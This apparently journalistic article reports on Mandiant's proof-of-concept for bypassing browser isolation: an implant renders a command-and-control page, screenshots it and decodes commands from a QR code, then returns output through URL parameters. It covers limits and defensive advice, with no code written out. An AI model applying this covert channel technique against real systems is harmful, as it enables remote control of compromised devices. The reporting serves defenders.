Researchers demonstrate a proof-of-concept cyberattack vector that gets around remote, on-premises, and local versions of browser isolation security technology to send malicious communications from an attacker-controlled server.
Security researchers have found a way to bypass three types of browser isolation, which would allow a cyberattacker to send malicious data to a remote device by using QR codes.
Researchers from Mandiant demonstrated a proof-of-concept (PoC) that gets around remote, on-premises, and local browser isolation by overriding HTTP request-based communication with machine-readable QR codes. In this way, the technique allows attackers to send commands from a command-and-control (C2) server to a victim’s device.
Browser isolation is often used by organizations to fight phishing threats, protect a device from browser-delivered attacks, and deter typical C2 tactics used by attackers. The technique runs a browser in a secure environment — such as a cloud server or virtual machine — and then streams the visual content to the user’s device.
When browser isolation is being used, the remote browser handles everything from page rendering to executing JavaScript, with only the visual appearance of the webpage sent back to the user’s local browser.
As attackers generally send commands to and from a victim’s device through HTTP requests, browser isolation makes it challenging for attackers to remotely control a device in the typical way. That’s because the HTTP response returned to the local browser contains only the streaming engine to render the remote browser’s visual page contents, “and only a stream of pixels is sent to the local browser to visually render the webpage,” Mandiant principal security consultant Thibault Van Geluwe de Berlaere wrote in the post. “This prevents typical HTTP-based C2 because the local device cannot decode the HTTP response.”
Bypassing Browser Isolation With QR Codes
Mandiant researchers developed a PoC that demonstrates how to get around browser isolation using the Puppeteer JavaScript library and the Google Chrome browser in headless mode. However, any modern browser can be used to achieve the PoC, Van Geluwe de Berlaere noted.
Instead of returning the C2 data in the HTTP request headers or body, as a typical attacker-controlled attempt to send commands to a device might, the C2 server returns a valid webpage that visually shows a QR code. “The implant then uses a local headless browser … to render the page, grabs a screenshot, and reads the QR code to retrieve the embedded data,” Van Geluwe de Berlaere wrote.
“By taking advantage of machine-readable QR codes, an attacker can send data from the attacker-controlled server to a malicious implant even when the webpage is rendered in a remote browser.”
In the attack sequence, the malicious implant visually renders the webpage from the browser isolation’s pixel streaming engine and decodes the command from the QR code displayed on the page. It then retrieves a valid HTML webpage from the C2 server with the command data encoded in a QR code visually shown on the page.
The remote browser then returns the pixel-streaming engine back to the local browser, starting a visual stream that shows the rendered page obtained from the C2 server. The implant waits for the page to fully render, then grabs a screenshot of the local browser that contains the QR code, which the malicious implant reads to execute the C2 command on the compromised device.
The implant then goes through the local browser again to navigate to a new URL that includes the command output encoded in a URL parameter. This parameter is passed through to the remote browser and ultimately to the C2 server, which decodes the command output as in traditional HTTP-based C2.
Challenges to Implementing the Bypass
Though the PoC demonstrates how attackers can get around browser isolation, there are some limitations and challenges to consider when using it, the researchers noted.
One is that it’s not feasible to use the PoC with QR codes that have the maximum data size — i.e., 2,953 bytes, 177×177 grid, Error Correction Level “L” — as “the visual stream of the webpage rendered in the local browser was of insufficient quality to reliably read the QR code contents,” Van Geluwe de Berlaere explained. Instead, the researchers used QR codes containing a maximum of 2,189 bytes of content.
Moreover, the requests take at least five seconds to reliably show and scan the QR code due to the processing involved when using Chrome in headless mode, as well as the time it takes for the remote browser to start up, page-rendering requirements, and the stream of visual content from the remote browser back to the local browser. “This introduces significant latency in the C2 channel,” he wrote.
Finally, the PoC does not consider other security features of browser isolation, such as domain reputation, URL scanning, data-loss prevention, and request heuristics, which may need to be overcome if they are present in the browser-isolation environment on which it is being used.
Despite the success of the bypass, Mandiant still recommends browser isolation as a strong protection measure against client-side browser exploitation and phishing attacks. However, Van Geluwe de Berlaere wrote, it should be used as one part of “a well-rounded cyber defense posture” that also includes monitoring for anomalous network traffic and browser in automation mode to defend against Web-based attacks.